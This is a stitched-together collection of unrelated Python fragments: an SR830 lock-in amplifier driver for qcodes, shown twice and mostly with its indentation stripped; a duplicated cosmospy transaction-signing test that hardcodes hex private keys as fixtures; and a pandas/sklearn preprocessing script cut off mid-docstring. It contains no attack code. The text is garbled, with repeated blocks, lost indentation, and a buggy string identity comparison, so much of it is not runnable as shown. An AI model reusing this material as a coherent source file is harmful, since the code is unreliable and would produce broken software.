get_cmd='SRAT ?',
set_cmd=self._set_buffer_SR,
unit='Hz',
val_mapping={62.5e-3: 0,
0.125: 1,
0.250: 2,
0.5: 3,
1: 4, 2: 5,
4: 6, 8: 7,
16: 8, 32: 9,
64: 10, 128: 11,
256: 12, 512: 13,
'Trigger': 14},
get_parser=int
)
self.add_parameter('buffer_acq_mode',
label='Buffer acquistion mode',
get_cmd='SEND ?',
set_cmd='SEND {}',
val_mapping={'single shot': 0,
'loop': 1},
get_parser=int)
self.add_parameter('buffer_trig_mode',
label='Buffer trigger start mode',
get_cmd='TSTR ?',
set_cmd='TSTR {}',
val_mapping={'ON': 1, 'OFF': 0},
get_parser=int)
self.add_parameter('buffer_npts',
label='Buffer number of stored points',
get_cmd='SPTS ?',
get_parser=int)
# Auto functions
self.add_function('auto_gain', call_cmd='AGAN')
self.add_function('auto_reserve', call_cmd='ARSV')
self.add_function('auto_phase', call_cmd='APHS')
self.add_function('auto_offset', call_cmd='AOFF {0}',
args=[Enum(1, 2, 3)])
# Interface
self.add_function('reset', call_cmd='*RST')
self.add_function('disable_front_panel', call_cmd='OVRM 0')
self.add_function('enable_front_panel', call_cmd='OVRM 1')
self.add_function('send_trigger', call_cmd='TRIG',
docstring=("Send a software trigger. "
"This command has the same effect as a "
"trigger at the rear panel trigger"
" input."))
self.add_function('buffer_start', call_cmd='STRT',
docstring=("The buffer_start command starts or "
"resumes data storage. buffer_start"
" is ignored if storage is already in"
" progress."))
self.add_function('buffer_pause', call_cmd='PAUS',
docstring=("The buffer_pause command pauses data "
"storage. If storage is already paused "
"or reset then this command is ignored."))
self.add_function('buffer_reset', call_cmd='REST',
docstring=("The buffer_reset command resets the data"
" buffers. The buffer_reset command can "
"be sent at any time - any storage in "
"progress, paused or not, will be reset."
" This command will erase the data "
"buffer."))
# Initialize the proper units of the outputs and sensitivities
self.input_config()
# start keeping track of buffer setpoints
self._buffer1_ready = False
self._buffer2_ready = False
self.connect_message()
SNAP_PARAMETERS = {
'x': '1',
'y': '2',
'r': '3',
'p': '4',
'phase': '4',
'θ' : '4',
'aux1': '5',
'aux2': '6',
'aux3': '7',
'aux4': '8',
'freq': '9',
'ch1': '10',
'ch2': '11'
}
def snap(self, *parameters: str) -> Tuple[float, ...]:
"""
Get between 2 and 6 parameters at a single instant. This provides a
coherent snapshot of measured signals. Pick up to 6 from: X, Y, R, θ,
the aux inputs 1-4, frequency, or what is currently displayed on
channels 1 and 2.
Reading X and Y (or R and θ) gives a coherent snapshot of the signal.
Snap is important when the time constant is very short, a time constant
less than 100 ms.
Args:
*parameters
From 2 to 6 strings of names of parameters for which the values
are requested. including: 'x', 'y', 'r', 'p', 'phase' or 'θ',
'aux1', 'aux2', 'aux3', 'aux4', 'freq', 'ch1', and 'ch2'.
Returns:
A tuple of floating point values in the same order as requested.
Examples:
lockin.snap('x','y') -> tuple(x,y)
lockin.snap('aux1','aux2','freq','phase')
-> tuple(aux1,aux2,freq,phase)
Note:
Volts for x, y, r, and aux 1-4
Degrees for θ
Hertz for freq
Unknown for ch1 and ch2. It will depend on what was set.
- If X,Y,R and θ are all read, then the values of X,Y are recorded
approximately 10 µs apart from R,θ. Thus, the values of X and Y
may not yield the exact values of R and θ from a single snap.
- The values of the Aux Inputs may have an uncertainty of
up to 32 µs.
- The frequency is computed only every other period or 40 ms,
whichever is longer.
"""
if not 2 <= len(parameters) <= 6:
raise KeyError(
'It is only possible to request values of 2 to 6 parameters'
' at a time.')
for name in parameters:
if name.lower() not in self.SNAP_PARAMETERS:
raise KeyError(f'{name} is an unknown parameter. Refer'
f' to `SNAP_PARAMETERS` for a list of valid'
f' parameter names')
p_ids = [self.SNAP_PARAMETERS[name.lower()] for name in parameters]
output = self.ask(f'SNAP? {','.join(p_ids)}')
return tuple(float(val) for val in output.split(','))
def increment_sensitivity(self):
"""
Increment the sensitivity setting of the lock-in. This is equivalent
to pushing the sensitivity up button on the front panel. This has no
effect if the sensitivity is already at the maximum.
Returns:
Whether or not the sensitivity was actually changed.
"""
return self._change_sensitivity(1)
def decrement_sensitivity(self):
"""
Decrement the sensitivity setting of the lock-in. This is equivalent
to pushing the sensitivity down button on the front panel. This has no
effect if the sensitivity is already at the minimum.
Returns:
Whether or not the sensitivity was actually changed.
"""
return self._change_sensitivity(-1)
def _change_sensitivity(self, dn):
_ = self.sensitivity.get()
n = int(self.sensitivity.raw_value)
if self.input_config() in ['a', 'a-b']:
n_to = self._N_TO_VOLT
else:
n_to = self._N_TO_CURR
if n + dn > max(n_to.keys()) or n + dn < min(n_to.keys()):
return False
self.sensitivity.set(n_to[n + dn])
return True
def _set_buffer_SR(self, SR):
self.write('SRAT {}'.format(SR))
self._buffer1_ready = False
self._buffer2_ready = False
def _get_ch_ratio(self, channel):
val_mapping = {1: {0: 'none',
1: 'Aux In 1',
2: 'Aux In 2'},
2: {0: 'none',
1: 'Aux In 3',
2: 'Aux In 4'}}
resp = int(self.ask('DDEF ? {}'.format(channel)).split(',')[1])
return val_mapping[channel][resp]
def _set_ch_ratio(self, channel, ratio):
val_mapping = {1: {'none': 0,
'Aux In 1': 1,
'Aux In 2': 2},
2: {'none': 0,
'Aux In 3': 1,
'Aux In 4': 2}}
vals = val_mapping[channel].keys()
if ratio not in vals:
raise ValueError('{} not in {}'.format(ratio, vals))
ratio = val_mapping[channel][ratio]
disp_val = int(self.ask('DDEF ? {}'.format(channel)).split(',')[0])
self.write('DDEF {}, {}, {}'.format(channel, disp_val, ratio))
self._buffer_ready = False
def _get_ch_display(self, channel):
val_mapping = {1: {0: 'X',
1: 'R',
2: 'X Noise',
3: 'Aux In 1',
4: 'Aux In 2'},
2: {0: 'Y',
1: 'Phase',
2: 'Y Noise',
3: 'Aux In 3',
4: 'Aux In 4'}}
resp = int(self.ask('DDEF ? {}'.format(channel)).split(',')[0])
return val_mapping[channel][resp]
def _set_ch_display(self, channel, disp):
val_mapping = {1: {'X': 0,
'R': 1,
'X Noise': 2,
'Aux In 1': 3,
'Aux In 2': 4},
2: {'Y': 0,
'Phase': 1,
'Y Noise': 2,
'Aux In 3': 3,
'Aux In 4': 4}}
vals = val_mapping[channel].keys()
if disp not in vals:
raise ValueError('{} not in {}'.format(disp, vals))
disp = val_mapping[channel][disp]
# Since ratio AND display are set simultaneously,
# we get and then re-set the current ratio value
ratio_val = int(self.ask('DDEF ? {}'.format(channel)).split(',')[1])
self.write('DDEF {}, {}, {}'.format(channel, disp, ratio_val))
self._buffer_ready = False
def _set_units(self, unit):
# TODO:
# make a public parameter function that allows to change the units
for param in [self.X, self.Y, self.R, self.sensitivity]:
param.unit = unit
def _get_input_config(self, s):
mode = self._N_TO_INPUT_CONFIG[int(s)]
if mode in ['a', 'a-b']:
self.sensitivity.vals = self._VOLT_ENUM
self._set_units('V')
else:
self.sensitivity.vals = self._CURR_ENUM
self._set_units('A')
return mode
def _set_input_config(self, s):
if s in ['a', 'a-b']:
self.sensitivity.vals = self._VOLT_ENUM
self._set_units('V')
else:
self.sensitivity.vals = self._CURR_ENUM
self._set_units('A')
return self._INPUT_CONFIG_TO_N[s]
def _get_sensitivity(self, s):
if self.input_config() in ['a', 'a-b']:
return self._N_TO_VOLT[int(s)]
else:
return self._N_TO_CURR[int(s)]
def _set_sensitivity(self, s):
if self.input_config() in ['a', 'a-b']:
return self._VOLT_TO_N[s]
else:
return self._CURR_TO_N[s]
| from functools import partial
import numpy as np
from qcodes import VisaInstrument
from qcodes.instrument.parameter import ArrayParameter
from qcodes.utils.validators import Numbers, Ints, Enum, Strings
from typing import Tuple
class ChannelBuffer(ArrayParameter):
"""
Parameter class for the two channel buffers
Currently always returns the entire buffer
TODO (WilliamHPNielsen): Make it possible to query parts of the buffer.
The instrument natively supports this in its TRCL call.
"""
def __init__(self, name: str, instrument: 'SR830', channel: int) -> None:
"""
Args:
name (str): The name of the parameter
instrument (SR830): The parent instrument
channel (int): The relevant channel (1 or 2). The name should
should match this.
"""
self._valid_channels = (1, 2)
if channel not in self._valid_channels:
raise ValueError('Invalid channel specifier. SR830 only has '
'channels 1 and 2.')
if not isinstance(instrument, SR830):
raise ValueError('Invalid parent instrument. ChannelBuffer '
'can only live on an SR830.')
super().__init__(name,
shape=(1,), # dummy initial shape
unit='V', # dummy initial unit
setpoint_names=('Time',),
setpoint_labels=('Time',),
setpoint_units=('s',),
docstring='Holds an acquired (part of the) '
'data buffer of one channel.')
self.channel = channel
self._instrument = instrument
def prepare_buffer_readout(self):
"""
Function to generate the setpoints for the channel buffer and
get the right units
"""
N = self._instrument.buffer_npts() # problem if this is zero?
# TODO (WilliamHPNielsen): what if SR was changed during acquisition?
SR = self._instrument.buffer_SR()
if SR == 'Trigger':
self.setpoint_units = ('',)
self.setpoint_names = ('trig_events',)
self.setpoint_labels = ('Trigger event number',)
self.setpoints = (tuple(np.arange(0, N)),)
else:
dt = 1/SR
self.setpoint_units = ('s',)
self.setpoint_names = ('Time',)
self.setpoint_labels = ('Time',)
self.setpoints = (tuple(np.linspace(0, N*dt, N)),)
self.shape = (N,)
params = self._instrument.parameters
# YES, it should be: "is not 'none'" NOT "is not None"
if params['ch{}_ratio'.format(self.channel)].get() is not 'none':
self.unit = '%'
else:
disp = params['ch{}_display'.format(self.channel)].get()
if disp == 'Phase':
self.unit = 'deg'
else:
self.unit = 'V'
if self.channel == 1:
self._instrument._buffer1_ready = True
else:
self._instrument._buffer2_ready = True
def get_raw(self):
"""
Get command. Returns numpy array
"""
if self.channel == 1:
ready = self._instrument._buffer1_ready
else:
ready = self._instrument._buffer2_ready
if not ready:
raise RuntimeError('Buffer not ready. Please run '
'prepare_buffer_readout')
N = self._instrument.buffer_npts()
if N == 0:
raise ValueError('No points stored in SR830 data buffer.'
' Can not poll anything.')
# poll raw binary data
self._instrument.write('TRCL ? {}, 0, {}'.format(self.channel, N))
rawdata = self._instrument.visa_handle.read_raw()
# parse it
realdata = np.fromstring(rawdata, dtype='<i2')
numbers = realdata[::2]*2.0**(realdata[1::2]-124)
if self.shape[0] != N:
raise RuntimeError("SR830 got {} points in buffer expected {}".format(N, self.shape[0]))
return numbers
class SR830(VisaInstrument):
"""
This is the qcodes driver for the Stanford Research Systems SR830
Lock-in Amplifier
"""
_VOLT_TO_N = {2e-9: 0, 5e-9: 1, 10e-9: 2,
20e-9: 3, 50e-9: 4, 100e-9: 5,
200e-9: 6, 500e-9: 7, 1e-6: 8,
2e-6: 9, 5e-6: 10, 10e-6: 11,
20e-6: 12, 50e-6: 13, 100e-6: 14,
200e-6: 15, 500e-6: 16, 1e-3: 17,
2e-3: 18, 5e-3: 19, 10e-3: 20,
20e-3: 21, 50e-3: 22, 100e-3: 23,
200e-3: 24, 500e-3: 25, 1: 26}
_N_TO_VOLT = {v: k for k, v in _VOLT_TO_N.items()}
_CURR_TO_N = {2e-15: 0, 5e-15: 1, 10e-15: 2,
20e-15: 3, 50e-15: 4, 100e-15: 5,
200e-15: 6, 500e-15: 7, 1e-12: 8,
2e-12: 9, 5e-12: 10, 10e-12: 11,
20e-12: 12, 50e-12: 13, 100e-12: 14,
200e-12: 15, 500e-12: 16, 1e-9: 17,
2e-9: 18, 5e-9: 19, 10e-9: 20,
20e-9: 21, 50e-9: 22, 100e-9: 23,
200e-9: 24, 500e-9: 25, 1e-6: 26}
_N_TO_CURR = {v: k for k, v in _CURR_TO_N.items()}
_VOLT_ENUM = Enum(*_VOLT_TO_N.keys())
_CURR_ENUM = Enum(*_CURR_TO_N.keys())
_INPUT_CONFIG_TO_N = {
'a': 0,
'a-b': 1,
'I 1M': 2,
'I 100M': 3,
}
_N_TO_INPUT_CONFIG = {v: k for k, v in _INPUT_CONFIG_TO_N.items()}
def __init__(self, name, address, **kwargs):
super().__init__(name, address, **kwargs)
# Reference and phase
self.add_parameter('phase',
label='Phase',
get_cmd='PHAS?',
get_parser=float,
set_cmd='PHAS {:.2f}',
unit='deg',
vals=Numbers(min_value=-360, max_value=729.99))
self.add_parameter('reference_source',
label='Reference source',
get_cmd='FMOD?',
set_cmd='FMOD {}',
val_mapping={
'external': 0,
'internal': 1,
},
vals=Enum('external', 'internal'))
self.add_parameter('frequency',
label='Frequency',
get_cmd='FREQ?',
get_parser=float,
set_cmd='FREQ {:.4f}',
unit='Hz',
vals=Numbers(min_value=1e-3, max_value=102e3))
self.add_parameter('ext_trigger',
label='External trigger',
get_cmd='RSLP?',
set_cmd='RSLP {}',
val_mapping={
'sine': 0,
'TTL rising': 1,
'TTL falling': 2,
})
self.add_parameter('harmonic',
label='Harmonic',
get_cmd='HARM?',
get_parser=int,
set_cmd='HARM {:d}',
vals=Ints(min_value=1, max_value=19999))
self.add_parameter('amplitude',
label='Amplitude',
get_cmd='SLVL?',
get_parser=float,
set_cmd='SLVL {:.3f}',
unit='V',
vals=Numbers(min_value=0.004, max_value=5.000))
# Input and filter
self.add_parameter('input_config',
label='Input configuration',
get_cmd='ISRC?',
get_parser=self._get_input_config,
set_cmd='ISRC {}',
set_parser=self._set_input_config,
vals=Enum(*self._INPUT_CONFIG_TO_N.keys()))
self.add_parameter('input_shield',
label='Input shield',
get_cmd='IGND?',
set_cmd='IGND {}',
val_mapping={
'float': 0,
'ground': 1,
})
self.add_parameter('input_coupling',
label='Input coupling',
get_cmd='ICPL?',
set_cmd='ICPL {}',
val_mapping={
'AC': 0,
'DC': 1,
})
self.add_parameter('notch_filter',
label='Notch filter',
get_cmd='ILIN?',
set_cmd='ILIN {}',
val_mapping={
'off': 0,
'line in': 1,
'2x line in': 2,
'both': 3,
})
# Gain and time constant
self.add_parameter(name='sensitivity',
label='Sensitivity',
get_cmd='SENS?',
set_cmd='SENS {:d}',
get_parser=self._get_sensitivity,
set_parser=self._set_sensitivity
)
self.add_parameter('reserve',
label='Reserve',
get_cmd='RMOD?',
set_cmd='RMOD {}',
val_mapping={
'high': 0,
'normal': 1,
'low noise': 2,
})
self.add_parameter('time_constant',
label='Time constant',
get_cmd='OFLT?',
set_cmd='OFLT {}',
unit='s',
val_mapping={
10e-6: 0, 30e-6: 1,
100e-6: 2, 300e-6: 3,
1e-3: 4, 3e-3: 5,
10e-3: 6, 30e-3: 7,
100e-3: 8, 300e-3: 9,
1: 10, 3: 11,
10: 12, 30: 13,
100: 14, 300: 15,
1e3: 16, 3e3: 17,
10e3: 18, 30e3: 19,
})
self.add_parameter('filter_slope',
label='Filter slope',
get_cmd='OFSL?',
set_cmd='OFSL {}',
unit='dB/oct',
val_mapping={
6: 0,
12: 1,
18: 2,
24: 3,
})
self.add_parameter('sync_filter',
label='Sync filter',
get_cmd='SYNC?',
set_cmd='SYNC {}',
val_mapping={
'off': 0,
'on': 1,
})
def parse_offset_get(s):
parts = s.split(',')
return float(parts[0]), int(parts[1])
# TODO: Parameters that can be set with multiple arguments
# For the OEXP command for example two arguments are needed
self.add_parameter('X_offset',
get_cmd='OEXP? 1',
get_parser=parse_offset_get)
self.add_parameter('Y_offset',
get_cmd='OEXP? 2',
get_parser=parse_offset_get)
self.add_parameter('R_offset',
get_cmd='OEXP? 3',
get_parser=parse_offset_get)
# Aux input/output
for i in [1, 2, 3, 4]:
self.add_parameter('aux_in{}'.format(i),
label='Aux input {}'.format(i),
get_cmd='OAUX? {}'.format(i),
get_parser=float,
unit='V')
self.add_parameter('aux_out{}'.format(i),
label='Aux output {}'.format(i),
get_cmd='AUXV? {}'.format(i),
get_parser=float,
set_cmd='AUXV {0}, {{}}'.format(i),
unit='V')
# Setup
self.add_parameter('output_interface',
label='Output interface',
get_cmd='OUTX?',
set_cmd='OUTX {}',
val_mapping={
'RS232': '0\n',
'GPIB': '1\n',
})
# Channel setup
for ch in range(1, 3):
# detailed validation and mapping performed in set/get functions
self.add_parameter('ch{}_ratio'.format(ch),
label='Channel {} ratio'.format(ch),
get_cmd=partial(self._get_ch_ratio, ch),
set_cmd=partial(self._set_ch_ratio, ch),
vals=Strings())
self.add_parameter('ch{}_display'.format(ch),
label='Channel {} display'.format(ch),
get_cmd=partial(self._get_ch_display, ch),
set_cmd=partial(self._set_ch_display, ch),
vals=Strings())
self.add_parameter('ch{}_databuffer'.format(ch),
channel=ch,
parameter_class=ChannelBuffer)
# Data transfer
self.add_parameter('X',
get_cmd='OUTP? 1',
get_parser=float,
unit='V')
self.add_parameter('Y',
get_cmd='OUTP? 2',
get_parser=float,
unit='V')
self.add_parameter('R',
get_cmd='OUTP? 3',
get_parser=float,
unit='V')
self.add_parameter('P',
get_cmd='OUTP? 4',
get_parser=float,
unit='deg')
# Data buffer settings
self.add_parameter('buffer_SR',
label='Buffer sample rate',
get_cmd='SRAT ?',
set_cmd=self._set_buffer_SR,
unit='Hz',
val_mapping={62.5e-3: 0,
0.125: 1,
0.250: 2,
0.5: 3,
1: 4, 2: 5,
4: 6, 8: 7,
16: 8, 32: 9,
64: 10, 128: 11,
256: 12, 512: 13,
'Trigger': 14},
get_parser=int
)
self.add_parameter('buffer_acq_mode',
label='Buffer acquistion mode',
get_cmd='SEND ?',
set_cmd='SEND {}',
val_mapping={'single shot': 0,
'loop': 1},
get_parser=int)
self.add_parameter('buffer_trig_mode',
label='Buffer trigger start mode',
get_cmd='TSTR ?',
set_cmd='TSTR {}',
val_mapping={'ON': 1, 'OFF': 0},
get_parser=int)
self.add_parameter('buffer_npts',
label='Buffer number of stored points',
get_cmd='SPTS ?',
get_parser=int)
# Auto functions
self.add_function('auto_gain', call_cmd='AGAN')
self.add_function('auto_reserve', call_cmd='ARSV')
self.add_function('auto_phase', call_cmd='APHS')
self.add_function('auto_offset', call_cmd='AOFF {0}',
args=[Enum(1, 2, 3)])
# Interface
self.add_function('reset', call_cmd='*RST')
self.add_function('disable_front_panel', call_cmd='OVRM 0')
self.add_function('enable_front_panel', call_cmd='OVRM 1')
self.add_function('send_trigger', call_cmd='TRIG',
docstring=("Send a software trigger. "
"This command has the same effect as a "
"trigger at the rear panel trigger"
" input."))
self.add_function('buffer_start', call_cmd='STRT',
docstring=("The buffer_start command starts or "
"resumes data storage. buffer_start"
" is ignored if storage is already in"
" progress."))
self.add_function('buffer_pause', call_cmd='PAUS',
docstring=("The buffer_pause command pauses data "
"storage. If storage is already paused "
"or reset then this command is ignored."))
self.add_function('buffer_reset', call_cmd='REST',
docstring=("The buffer_reset command resets the data"
" buffers. The buffer_reset command can "
"be sent at any time - any storage in "
"progress, paused or not, will be reset."
" This command will erase the data "
"buffer."))
# Initialize the proper units of the outputs and sensitivities
self.input_config()
# start keeping track of buffer setpoints
self._buffer1_ready = False
self._buffer2_ready = False
self.connect_message()
# Mapping from human-readable parameter names to the numeric codes that the
# instrument's "SNAP?" query expects (consumed by snap()).
SNAP_PARAMETERS = {
    'x': '1',
    'y': '2',
    'r': '3',
    'p': '4',
    'phase': '4',
    'θ': '4',
    'aux1': '5',
    'aux2': '6',
    'aux3': '7',
    'aux4': '8',
    'freq': '9',
    'ch1': '10',
    'ch2': '11',
}
def snap(self, *parameters: str) -> Tuple[float, ...]:
    """
    Read 2 to 6 signal values in a single coherent instant.

    Valid names (case-insensitive) are the keys of ``SNAP_PARAMETERS``:
    'x', 'y', 'r', 'p'/'phase'/'θ', 'aux1'..'aux4', 'freq', 'ch1', 'ch2'.
    Useful with short time constants, where sequential reads would not be
    simultaneous.

    Args:
        *parameters: names of the quantities to read, in the order the
            values should be returned.

    Returns:
        Tuple of floats, one per requested name, in request order.

    Raises:
        KeyError: if fewer than 2 or more than 6 names are given, or if a
            name is not in ``SNAP_PARAMETERS``.
    """
    if len(parameters) < 2 or len(parameters) > 6:
        raise KeyError('It is only possible to request values of 2 to 6'
                       ' parameters at a time.')
    # Validate every name before talking to the instrument.
    for name in parameters:
        if name.lower() not in self.SNAP_PARAMETERS:
            raise KeyError(f'{name} is an unknown parameter. Refer to'
                           f' `SNAP_PARAMETERS` for a list of valid'
                           f' parameter names')
    codes = [self.SNAP_PARAMETERS[name.lower()] for name in parameters]
    reply = self.ask(f'SNAP? {",".join(codes)}')
    return tuple(float(field) for field in reply.split(','))
def increment_sensitivity(self):
    """
    Step the sensitivity one setting up, like the front-panel "up" button.
    Does nothing when already at the maximum setting.

    Returns:
        Whether or not the sensitivity was actually changed.
    """
    return self._change_sensitivity(+1)
def decrement_sensitivity(self):
    """
    Step the sensitivity one setting down, like the front-panel "down"
    button. Does nothing when already at the minimum setting.

    Returns:
        Whether or not the sensitivity was actually changed.
    """
    return self._change_sensitivity(-1)
def _change_sensitivity(self, dn):
_ = self.sensitivity.get()
n = int(self.sensitivity.raw_value)
if self.input_config() in ['a', 'a-b']:
n_to = self._N_TO_VOLT
else:
n_to = self._N_TO_CURR
if n + dn > max(n_to.keys()) or n + dn < min(n_to.keys()):
return False
self.sensitivity.set(n_to[n + dn])
return True
def _set_buffer_SR(self, SR):
self.write('SRAT {}'.format(SR))
self._buffer1_ready = False
self._buffer2_ready = False
def _get_ch_ratio(self, channel):
val_mapping = {1: {0: 'none',
1: 'Aux In 1',
2: 'Aux In 2'},
2: {0: 'none',
1: 'Aux In 3',
2: 'Aux In 4'}}
resp = int(self.ask('DDEF ? {}'.format(channel)).split(',')[1])
return val_mapping[channel][resp]
def _set_ch_ratio(self, channel, ratio):
val_mapping = {1: {'none': 0,
'Aux In 1': 1,
'Aux In 2': 2},
2: {'none': 0,
'Aux In 3': 1,
'Aux In 4': 2}}
vals = val_mapping[channel].keys()
if ratio not in vals:
raise ValueError('{} not in {}'.format(ratio, vals))
ratio = val_mapping[channel][ratio]
disp_val = int(self.ask('DDEF ? {}'.format(channel)).split(',')[0])
self.write('DDEF {}, {}, {}'.format(channel, disp_val, ratio))
self._buffer_ready = False
def _get_ch_display(self, channel):
val_mapping = {1: {0: 'X',
1: 'R',
2: 'X Noise',
3: 'Aux In 1',
4: 'Aux In 2'},
2: {0: 'Y',
1: 'Phase',
2: 'Y Noise',
3: 'Aux In 3',
4: 'Aux In 4'}}
resp = int(self.ask('DDEF ? {}'.format(channel)).split(',')[0])
return val_mapping[channel][resp]
def _set_ch_display(self, channel, disp):
val_mapping = {1: {'X': 0,
'R': 1,
'X Noise': 2,
'Aux In 1': 3,
'Aux In 2': 4},
2: {'Y': 0,
'Phase': 1,
'Y Noise': 2,
'Aux In 3': 3,
'Aux In 4': 4}}
vals = val_mapping[channel].keys()
if disp not in vals:
raise ValueError('{} not in {}'.format(disp, vals))
disp = val_mapping[channel][disp]
# Since ratio AND display are set simultaneously,
# we get and then re-set the current ratio value
ratio_val = int(self.ask('DDEF ? {}'.format(channel)).split(',')[1])
self.write('DDEF {}, {}, {}'.format(channel, disp, ratio_val))
self._buffer_ready = False
def _set_units(self, unit):
# TODO:
# make a public parameter function that allows to change the units
for param in [self.X, self.Y, self.R, self.sensitivity]:
param.unit = unit
def _get_input_config(self, s):
mode = self._N_TO_INPUT_CONFIG[int(s)]
if mode in ['a', 'a-b']:
self.sensitivity.vals = self._VOLT_ENUM
self._set_units('V')
else:
self.sensitivity.vals = self._CURR_ENUM
self._set_units('A')
return mode
def _set_input_config(self, s):
if s in ['a', 'a-b']:
self.sensitivity.vals = self._VOLT_ENUM
self._set_units('V')
else:
self.sensitivity.vals = self._CURR_ENUM
self._set_units('A')
return self._INPUT_CONFIG_TO_N[s]
def _get_sensitivity(self, s):
if self.input_config() in ['a', 'a-b']:
return self._N_TO_VOLT[int(s)]
else:
return self._N_TO_CURR[int(s)]
def _set_sensitivity(self, s):
if self.input_config() in ['a', 'a-b']:
return self._VOLT_TO_N[s]
else:
return self._CURR_TO_N[s]
|
from unittest.mock import Mock
from ward import test
from cosmospy import Transaction
@test("sign transaction")
def _():
private_key = bytes.fromhex("2afc5a66b30e7521d553ec8e6f7244f906df97477248c30c103d7b3f2c671fef")
unordered_sign_message = {
"chain_id": "tendermint_test",
"account_number": "1",
"fee": {"gas": "21906", "amount": [{"amount": "0", "denom": ""}]},
"memo": "",
"sequence": "0",
"msgs": [
{
"type": "cosmos-sdk/Send",
"value": {
"inputs": [
{
"address": "cosmos1qperwt9wrnkg5k9e5gzfgjppzpqhyav5j24d66",
"coins": [{"amount": "1", "denom": "STAKE"}],
}
],
"outputs": [
{
"address": "cosmos1yeckxz7tapz34kjwnjxvmxzurerquhtrmxmuxt",
"coins": [{"amount": "1", "denom": "STAKE"}],
}
],
},
}
],
}
dummy_num = 1337
tx = Transaction(
privkey=private_key,
account_num=dummy_num,
sequence=dummy_num,
fee=dummy_num,
gas=dummy_num,
)
tx._get_sign_message = Mock(return_value=unordered_sign_message)
expected_signature = (
"YjJhlAf7aCnUtLyBNDp9e6LKuNgV7hJC3rmm0Wro5nBsIPVtWzjuobsp/AhR5Kht+HcRF2zBq4AfoNQMIbY6fw=="
)
actual_signature = tx._sign()
assert actual_signature == expected_signature
@test("make transaction pushable to the HTTP API") # type: ignore[no-redef]
def _():
expected_pushable_tx = '{"tx":{"msg":[{"type":"cosmos-sdk/MsgSend","value":{"from_address":"cosmos1lgharzgds89lpshr7q8kcmd2esnxkfpwvuz5tr","to_address":"cosmos103l758ps7403sd9c0y8j6hrfw4xyl70j4mmwkf","amount":[{"denom":"uatom","amount":"387000"}]}}],"fee":{"gas":"37000","amount":[{"denom":"uatom","amount":"1000"}]},"memo":"","signatures":[{"signature":"chbQMmrg18ZQSt3q3HzW8S8pMyGs/TP/WIbbCyKFd5IiReUY/xJB2yRDEtF92yYBjxEU02z9JNE7VCQmmxWdQw==","pub_key":{"type":"tendermint/PubKeySecp256k1","value":"A49sjCd3Eul+ZXyof7qO460UaO73otrmySHyTNSLW+Xn"},"account_number":"11335","sequence":"0"}]},"mode":"sync"}' # noqa: E501
_tx_total_cost = 388000
fee = 1000
amount = _tx_total_cost - fee
tx = Transaction(
privkey=bytes.fromhex("26d167d549a4b2b66f766b0d3f2bdbe1cd92708818c338ff453abde316a2bd59"),
account_num=11335,
sequence=0,
fee=fee,
gas=37000,
chain_id="cosmoshub-2",
)
tx.add_transfer(recipient="cosmos103l758ps7403sd9c0y8j6hrfw4xyl70j4mmwkf", amount=amount)
pushable_tx = tx.get_pushable()
assert pushable_tx == expected_pushable_tx
| from unittest.mock import Mock
from ward import test
from cosmospy import Transaction
@test("sign transaction")
def _():
private_key = bytes.fromhex("2afc5a66b30e7521d553ec8e6f7244f906df97477248c30c103d7b3f2c671fef")
unordered_sign_message = {
"chain_id": "tendermint_test",
"account_number": "1",
"fee": {"gas": "21906", "amount": [{"amount": "0", "denom": ""}]},
"memo": "",
"sequence": "0",
"msgs": [
{
"type": "cosmos-sdk/Send",
"value": {
"inputs": [
{
"address": "cosmos1qperwt9wrnkg5k9e5gzfgjppzpqhyav5j24d66",
"coins": [{"amount": "1", "denom": "STAKE"}],
}
],
"outputs": [
{
"address": "cosmos1yeckxz7tapz34kjwnjxvmxzurerquhtrmxmuxt",
"coins": [{"amount": "1", "denom": "STAKE"}],
}
],
},
}
],
}
dummy_num = 1337
tx = Transaction(
privkey=private_key,
account_num=dummy_num,
sequence=dummy_num,
fee=dummy_num,
gas=dummy_num,
)
tx._get_sign_message = Mock(return_value=unordered_sign_message)
expected_signature = (
"YjJhlAf7aCnUtLyBNDp9e6LKuNgV7hJC3rmm0Wro5nBsIPVtWzjuobsp/AhR5Kht+HcRF2zBq4AfoNQMIbY6fw=="
)
actual_signature = tx._sign()
assert actual_signature == expected_signature
@test("make transaction pushable to the HTTP API") # type: ignore[no-redef]
def _():
expected_pushable_tx = '{"tx":{"msg":[{"type":"cosmos-sdk/MsgSend","value":{"from_address":"cosmos1lgharzgds89lpshr7q8kcmd2esnxkfpwvuz5tr","to_address":"cosmos103l758ps7403sd9c0y8j6hrfw4xyl70j4mmwkf","amount":[{"denom":"uatom","amount":"387000"}]}}],"fee":{"gas":"37000","amount":[{"denom":"uatom","amount":"1000"}]},"memo":"","signatures":[{"signature":"chbQMmrg18ZQSt3q3HzW8S8pMyGs/TP/WIbbCyKFd5IiReUY/xJB2yRDEtF92yYBjxEU02z9JNE7VCQmmxWdQw==","pub_key":{"type":"tendermint/PubKeySecp256k1","value":"A49sjCd3Eul+ZXyof7qO460UaO73otrmySHyTNSLW+Xn"},"account_number":"11335","sequence":"0"}]},"mode":"sync"}' # noqa: E501
_tx_total_cost = 388000
fee = 1000
amount = _tx_total_cost - fee
tx = Transaction(
privkey=bytes.fromhex("26d167d549a4b2b66f766b0d3f2bdbe1cd92708818c338ff453abde316a2bd59"),
account_num=11335,
sequence=0,
fee=fee,
gas=37000,
chain_id="cosmoshub-2",
)
tx.add_transfer(recipient="cosmos103l758ps7403sd9c0y8j6hrfw4xyl70j4mmwkf", amount=amount)
pushable_tx = tx.get_pushable()
assert pushable_tx == expected_pushable_tx
|
import pandas as pd
import logging
from sklearn.feature_selection import SelectKBest, chi2
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import GridSearchCV
import pickle
from sklearn.metrics import classification_report
logger = logging.getLogger(__name__)
def columns_to_dummies(df):
    """
    Convert the dataset's string labels to binary values.

    'Positive'/'Negative' in the ``class`` target become 1/0, every
    'Yes'/'No' answer becomes 1/0, and ``Gender`` is one-hot encoded
    with ``pd.get_dummies``.

    Parameters
    ----------
    df : pandas.DataFrame
        Raw project dataframe with all used columns.

    Returns
    -------
    pandas.DataFrame
        Numeric dataframe with ``Gender_*`` dummy columns.
    """
    df['class'] = df['class'].replace({'Positive': 1, 'Negative': 0})
    df = df.replace({'Yes': 1, 'No': 0})
    return pd.get_dummies(df, columns=['Gender'])
def transform_age(df):
    """
    Binarize patient age against the mean age of positive cases.

    Adds an ``Age_mean`` column: 1 when the patient's age is at or above
    the mean age of positive (``class`` == 1) patients, else 0.

    Parameters
    ----------
    df : pandas.DataFrame
        Dataset containing at least the ``Age`` and ``class`` columns.

    Returns
    -------
    pandas.DataFrame
